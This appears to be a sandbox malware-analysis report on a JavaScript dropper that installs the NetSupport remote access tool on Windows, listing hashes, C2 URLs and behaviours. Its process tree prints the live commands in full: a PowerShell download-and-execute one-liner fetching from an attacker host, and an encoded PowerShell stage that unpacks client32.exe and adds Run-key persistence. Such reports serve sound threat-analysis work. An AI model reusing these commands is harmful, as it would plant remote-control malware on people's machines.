Analysis
-
max time kernel
92s -
max time network
140s -
platform
windows10-2004_x64 -
resource
win10v2004-20231222-en -
resource tags
arch:x64arch:x86image:win10v2004-20231222-enlocale:en-usos:windows10-2004-x64system -
submitted
07-02-2024 09:32
Static task
static1
Behavioral task
behavioral1
Sample
ARS17291729317291729.js
Resource
win7-20231215-en
Behavioral task
behavioral2
Sample
ARS17291729317291729.js
Resource
win10v2004-20231222-en
General
-
Target
ARS17291729317291729.js
-
Size
22KB
-
MD5
f11df5cf2e7e9c6b39612f3f60d9e9f2
-
SHA1
d919fe3bd69418f9e96569f9e73b4a1fa1cde9e9
-
SHA256
2770b332ef571a1462e5a38778307106e16ba66dca58717fe40f6f76259b717b
-
SHA512
1629a66eb3f8f48fa15d016995eb26f7b6342420eac8f34fdf42d514db1be5813df7a40f553b63da16b8eb6bde66d35297d23c63cffa252951988a28242e65bf
-
SSDEEP
384:swbhSjLO+uDvTeLoxguxAR02OY4PLRyxag8YvA9DWWRUwuoLljIzPNWHvrHejQlJ:pwLOxvTeLoxguxARGPLRyxag8YvA9DWu
Malware Config
Extracted
https://assime.ca/command.php
Extracted
http://sakaleralo.com/ccea268b-8716-46be-9148-3e614b38a0df.txt
Signatures
-
NetSupport
NetSupport is a remote access tool sold as a legitimate system administration software.
-
Blocklisted process makes network request 2 IoCs
Processes:
powershell.exepowershell.exeflow pid process 15 4080 powershell.exe 17 4776 powershell.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
wscript.exedescription ioc process Key value queried \REGISTRY\USER\S-1-5-21-1168293393-3419776239-306423207-1000\Control Panel\International\Geo\Nation wscript.exe -
Executes dropped EXE 1 IoCs
Processes:
client32.exepid process 1480 client32.exe -
Loads dropped DLL 5 IoCs
Processes:
client32.exepid process 1480 client32.exe 1480 client32.exe 1480 client32.exe 1480 client32.exe 1480 client32.exe -
Adds Run key to start application 2 TTPs 1 IoCs
Processes:
powershell.exedescription ioc process Set value (str) \REGISTRY\USER\S-1-5-21-1168293393-3419776239-306423207-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\modem_gprs_modules = "C:\\Users\\Admin\\AppData\\Local\\modem_gprs_modules\\client32.exe" powershell.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious behavior: EnumeratesProcesses 4 IoCs
Processes:
powershell.exepowershell.exepid process 4080 powershell.exe 4080 powershell.exe 4776 powershell.exe 4776 powershell.exe -
Suspicious use of AdjustPrivilegeToken 3 IoCs
Processes:
powershell.exepowershell.execlient32.exedescription pid process Token: SeDebugPrivilege 4080 powershell.exe Token: SeDebugPrivilege 4776 powershell.exe Token: SeSecurityPrivilege 1480 client32.exe -
Suspicious use of FindShellTrayWindow 1 IoCs
Processes:
client32.exepid process 1480 client32.exe -
Suspicious use of WriteProcessMemory 7 IoCs
Processes:
wscript.exepowershell.exepowershell.exedescription pid process target process PID 3604 wrote to memory of 4080 3604 wscript.exe powershell.exe PID 3604 wrote to memory of 4080 3604 wscript.exe powershell.exe PID 4080 wrote to memory of 4776 4080 powershell.exe powershell.exe PID 4080 wrote to memory of 4776 4080 powershell.exe powershell.exe PID 4776 wrote to memory of 1480 4776 powershell.exe client32.exe PID 4776 wrote to memory of 1480 4776 powershell.exe client32.exe PID 4776 wrote to memory of 1480 4776 powershell.exe client32.exe
Processes
-
C:\Windows\system32\wscript.exewscript.exe C:\Users\Admin\AppData\Local\Temp\ARS17291729317291729.js1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:3604 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -NoProfile -Command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; Invoke-Expression (New-Object Net.WebClient).DownloadString('https://assime.ca/command.php')"2⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4080 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Nop -ExeCUtIONPol bYPASS -W hI -eNco QwBoAEQASQByACAAJABlAE4AdgA6AEwATwBDAEEAbABhAHAAcABEAGEAVABhADsAIAAkAEcAMgBmAGYAdwAwAGMAPQBbAGIAeQB0AGUAWwBdAF0AQAAoADgAMAAsACAANwA1ACwAIAAzACwAIAA0ACkAOwAgACQAawBuAHMAUABVADIAQQA9ACcAaAB0AHQAcAA6AC8ALwBzAGEAawBhAGwAZQByAGEAbABvAC4AYwBvAG0ALwBjAGMAZQBhADIANgA4AGIALQA4ADcAMQA2AC0ANAA2AGIAZQAtADkAMQA0ADgALQAzAGUANgAxADQAYgAzADgAYQAwAGQAZgAuAHQAeAB0ACcAOwAgACQAMwBsAEsAYwBVAEgAWAA9ACcAagBHAGgAVAB5AG8AaQBDAC4AegBpAHAAJwA7ACAAJABYAEYAeABiADMAPQAnAG0AbwBkAGUAbQBfAGcAcAByAHMAXwBtAG8AZAB1AGwAZQBzACcAOwAgACQARABFAGYAZgBJAFMAPQBpAE4AVgBPAEsAZQAtAFcAZQBCAHIAZQBxAFUAZQBzAHQAIAAtAFUAcgBJACAAJABrAG4AcwBQAFUAMgBBACAALQBVAHMARQBiAEEAcwBJAEMAUABhAFIAUwBJAE4AZwA7ACAAJABCAG0ASgBOAGcANQBmAD0AJABEAEUAZgBmAEkAUwAuAGMAbwBuAFQAZQBOAHQAOwAgACQATgBUADYAVgBPAEUAPQAkAGUATgB2ADoATABPAEMAQQBsAGEAcABwAEQAYQBUAGEALAAgACQAWABGAHgAYgAzACAALQBqAG8AaQBOACAAJwBcACcAOwAgACQAYwBrAGEAdQA4AD0AIgAkAGUATgB2ADoATABPAEMAQQBsAGEAcABwAEQAYQBUAGEAXAAkADMAbABLAGMAVQBIAFgAIgA7ACAAJABQAHgASQBCAFgAcwBvAEYAPQBbAEMAbwBOAFYARQBSAHQAXQA6ADoAZgByAG8AbQBiAGEAUwBlADYANABTAFQAcgBpAE4ARwAoACQAQgBtAEoATgBnADUAZgApADsAIAAkAEgANQBMAHoAawBIAFQAPQAkAFAAeABJAEIAWABzAG8ARgAgAC0AUwBQAGwASQBUACAAJwAgACcAIAAtAEEAcwAgAFsAQgB5AHQARQBbAF0AXQA7ACAAJAAxAFkASwBnAHMAcwBuAD0AJABHADIAZgBmAHcAMABjACsAJABIADUATAB6AGsASABUADsAIABTAGMAIAAkADMAbABLAGMAVQBIAFgAIAAkADEAWQBLAGcAcwBzAG4AIAAtAEUATgBDAG8AZABpAE4AZwAgAEIAWQBUAGUAOwAgAEUAeABwAEEAbgBkAC0AQQBSAEMAaABJAHYAZQAgAC0AcABBAHQAaAAgACQAYwBrAGEAdQA4ACAALQBkAEUAUwBUAGkAbgBBAFQAaQBvAE4AUABhAHQASAAgACQATgBUADYAVgBPAEUAIAAtAGYAbwBSAEMARQA7ACAAUgBJACAAJAAzAGwASwBjAFUASABYADsAIABDAEQAIAAkAE4AVAA2AFYATwBFADsAIAAkAFIAcQBQAHQAUQBkAD0AIgB7ADAAfQBcAGMAbABpAGUAbgB0ADMAMgAuAGUAeABlACIAIAAtAGYAIAAkAE4AVAA2AFYATwBFADsAIABzAHQAYQByAHQAIABjAGwAaQBlAG4AdAAzADIALgBlAHgAZQA7ACAATgBlAHcALQBJAFQARQBtAFAAcgBPAFAARQByAHQAeQAgAC0AUABhAFQASAAgACcASABLAEMAVQA6AFwAUwBPAEYAVABXAEEAUgBFAFwATQBpAGMAcgBvAHMAbwBmAHQAXABXAGkAbgBkAG8AdwBzAFwAQwB1AHIAcgBlAG4AdABWAGUAcgBzAGkAbwBuAFwAUgB1AG4AJwAgAC0ATgBhAE0AZQAgACQAWABGAHgAYgAzACAALQBWAGEATABVAEUAIAAkAFIAcQBQAHQAUQBkACAALQBwAFIAbwBQAGUAcgBUAHkAVABZAFAARQAgACcAUwB0AHIAaQBuAGcAJwA7AA==3⤵
- Blocklisted process makes network request
- Adds Run key to start application
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4776 -
C:\Users\Admin\AppData\Local\modem_gprs_modules\client32.exe"C:\Users\Admin\AppData\Local\modem_gprs_modules\client32.exe"4⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:1480
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
3KB
MD5512c6cab650bfda6ef2995f6b515ed6f
SHA1fec40abf4f5d74ea7f8828cee83770e423203083
SHA25684871d83ecd410fb4ddede63061d9c521d876d47a8ffdbb8609378447ba0d262
SHA512638fffef25de1c3e850eb4f4668c4fdafed7bde042b130325daf323b45d2784916381b410219473b5bbacb4c11c6b8b7ab892b3d5695edb0b0a0785233e8e19b
-
Filesize
1KB
MD50f6a3762a04bbb03336fb66a040afb97
SHA10a0495c79f3c8f4cb349d82870ad9f98fbbaac74
SHA25636e2fac0ab8aee32e193491c5d3df9374205e328a74de5648e7677eae7e1b383
SHA512cc9ebc020ec18013f8ab4d6ca5a626d54db84f8dc2d97e538e33bb9a673344a670a2580346775012c85f204472f7f4dd25a34e59f1b827642a21db3325424b69
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
101KB
MD528c8a8263249e68e073b7e07ea790233
SHA16229b94354c6a8c5b55607c999a61184e8134c72
SHA2569479a76792083c185382ff937028d2eb4bb0b8fe7051bc812e8d8c2bd747b5cd
SHA512ec69ab6c56feeb735661d009576176983911682edc352bb666a6b746641537468d0e4c75ac7371fcf1dd28358d139a8c517692293a17bb492ac8ed3174ebb674
-
Filesize
133KB
MD58685677d29cd28cd99365daba43bd91b
SHA1c7f81001c1bffe138bedcb29f8695d0c32da2bcd
SHA2566424c55ae5589e812f2233c0e579c78cce0a5b4dba9c52bd7d6f17a37575b924
SHA512653e46604afa00e5594b90a50baab9fa3aefc79c56d5520031bbe423806f05211024b6c549d905a5bddebda5ae94af63bb18fdf759774b491ac5f00f43a1092a
-
Filesize
153KB
MD54054ad31323fe183a5beff36509e5886
SHA1bcdc25fffb6e1be98c44e60b33556d5e7bf94747
SHA256aa3543e079d8cd6dfff32b842e87dc35916b63cab928697205ffa4059fdd2320
SHA5123a26d685a36c4eedbba4777db883a2331743aaba629104d83b753500e986831cb0153f379207f5aec100f0b8d89a673476d317c874be9d4ea76ad6f9d2408f2a
-
Filesize
259B
MD5866c96ba2823ac5fe70130dfaaa08531
SHA1892a656da1ea264c73082da8c6e5f5728abcb861
SHA2566a7c99e4bd767433c25d6df8df81baa99c05dd24fa064e45c306ff4d954e1921
SHA5120dafc66222bbfcb1558d9845ee4ddeb7a687561b08b86a07b66b120c22952a8082e041d9234d9c69c8ade5d4dae894d3f10afd7ba6dd3f057a08fb5d57c42112
-
Filesize
18KB
MD5a0b9388c5f18e27266a31f8c5765b263
SHA1906f7e94f841d464d4da144f7c858fa2160e36db
SHA256313117e723dda6ea3911faacd23f4405003fb651c73de8deff10b9eb5b4a058a
SHA5126051a0b22af135b4433474dc7c6f53fb1c06844d0a30ed596a3c6c80644df511b023e140c4878867fa2578c79695fac2eb303aea87c0ecfc15a4ad264bd0b3cd
-
Filesize
130KB
MD57937f859097b360b2cba516cf83ec59f
SHA1ddc3a3c20ee7c406f312a8e1cbd4a5cbc0a5ee4e
SHA256228a3ac9a4f0839c1fcd3e6208fe5c610928cac30ad38c1a19ac2af610fe0ca9
SHA512ff89b4d531e7349eee60a75eedee1be6f2581a108669124c21c4a9a37cefd9dd081a65f3c24651cfae54a29a85b771ca02f162c390c9058ae307744244983115
-
Filesize
161KB
MD58dd6ae67fced06599dd0643d18395338
SHA15972dae148c3ee037c3228d9797ef7bd054229fa
SHA25674cc09260f7c2bc0e2022ec43eda5648023e02b2bc752a1808e1ef5b0d7695a6
SHA512a7c5f12fcafaab7d9faa5045c5561465389f1c6e349292fa178d309ee60df00a01b7c7e5c5241373a7174a73700f92ff8fd206e2bc90505e1f49d09bc4dc55ef
-
Filesize
117KB
MD5a2b46c59f6e7e395d479b09464ecdba0
SHA192c132307dd21189b6d7912ddd934b50e50d1ec1
SHA25689f0c8f170fe9ea28b1056517160e92e2d7d4e8aa81f4ed696932230413a6ce1
SHA5124f4479ddcd9d0986aec3d789f9e14f9285e8d9d63a5b8f73c9e3203d3a53cd575b1e15edf0d5f640816bb7f25bd3501244e0f7c181a716a6804742ed2f1cf916
-
Filesize
641B
MD52cd1a8115b7328756129052384e2eed6
SHA19458e9553d3d1f075ed09a06fda3f36136781704
SHA25602ab893e7d31d7c3b18d27c3c4ef6e056da27cc6ad7efa76b8d4729403a067d2
SHA512df5630c14f1400166ecbf0854a48616c939c0467634c427f8a287edc5c064c0d259b1cec0b02ae7aa31e21d1609ff31f4e11285160323f2c24fcb02de4e20455
-
Filesize
93KB
MD5d36e2ebca79a97a3da7ae166355cb058
SHA1862d93a5b3191efc72537af7a823345180483ca0
SHA25609629d07055dd129387d8030e47f9f87be142938f7628ee16f3657ff3e7d408e
SHA512be19f11682a5c47d0bcdfc7163aeb2825d119e797ad80bc2c2ab47a18632e3f833faf9fef3ae18d1410adad9e4f29291284ad0a2cbbe7450b7e81fc5a0264501
-
Filesize
32KB
MD5dcde2248d19c778a41aa165866dd52d0
SHA17ec84be84fe23f0b0093b647538737e1f19ebb03
SHA2569074fd40ea6a0caa892e6361a6a4e834c2e51e6e98d1ffcda7a9a537594a6917
SHA512c5d170d420f1aeb9bcd606a282af6e8da04ae45c83d07faaacb73ff2e27f4188b09446ce508620124f6d9b447a40a23620cfb39b79f02b04bb9e513866352166